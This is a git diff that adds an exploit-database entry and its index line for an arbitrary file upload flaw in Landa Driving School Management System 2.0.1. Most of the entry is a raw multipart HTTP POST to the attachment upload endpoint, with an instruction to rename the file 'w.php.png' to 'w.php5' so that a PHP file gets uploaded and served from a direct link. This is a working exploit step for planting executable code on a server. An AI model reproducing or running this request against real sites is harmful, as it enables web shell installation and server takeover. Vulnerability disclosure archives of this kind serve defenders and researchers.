diff --git a/exploits/php/webapps/50681.txt b/exploits/php/webapps/50681.txt
new file mode 100644
index 000000000..9d0a0ecac
--- /dev/null
+++ b/exploits/php/webapps/50681.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Landa Driving School Management System 2.0.1 - Arbitrary File Upload
+# Version 2.0.1
+# Google Dork: N/A
+# Date: 17/01/2022
+# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
+# Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151
+Landa Driving School Management System contain arbitrary file upload
+registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw
+
+details
+
+POST /profile/attachment/upload/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
+Accept: */*
+Accept-Language: ar,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048
+Content-Length: 294983
+Origin: https://localhost
+Connection: close
+Referer: https://localhost/profile/91/
+Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------215084716322124620333137564048
+Content-Disposition: form-data; name="name"
+
+sddd
+-----------------------------215084716322124620333137564048
+Content-Disposition: form-data; name="csrf-token"
+
+e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf
+-----------------------------215084716322124620333137564048
+Content-Disposition: form-data; name="userid"
+
+91
+-----------------------------215084716322124620333137564048
+Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>>  change this to w.php5
+Content-Type: image/png
+
+
+you will have a direct link to the uploaded files
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 63127a09f..b2baf55d8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44758,3 +44758,4 @@ id,file,description,date,author,type,platform,port
 50676,exploits/php/webapps/50676.txt,"uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50681,exploits/php/webapps/50681.txt,"Landa Driving School Management System 2.0.1 - Arbitrary File Upload",1970-01-01,"Sohel Yousef",webapps,php,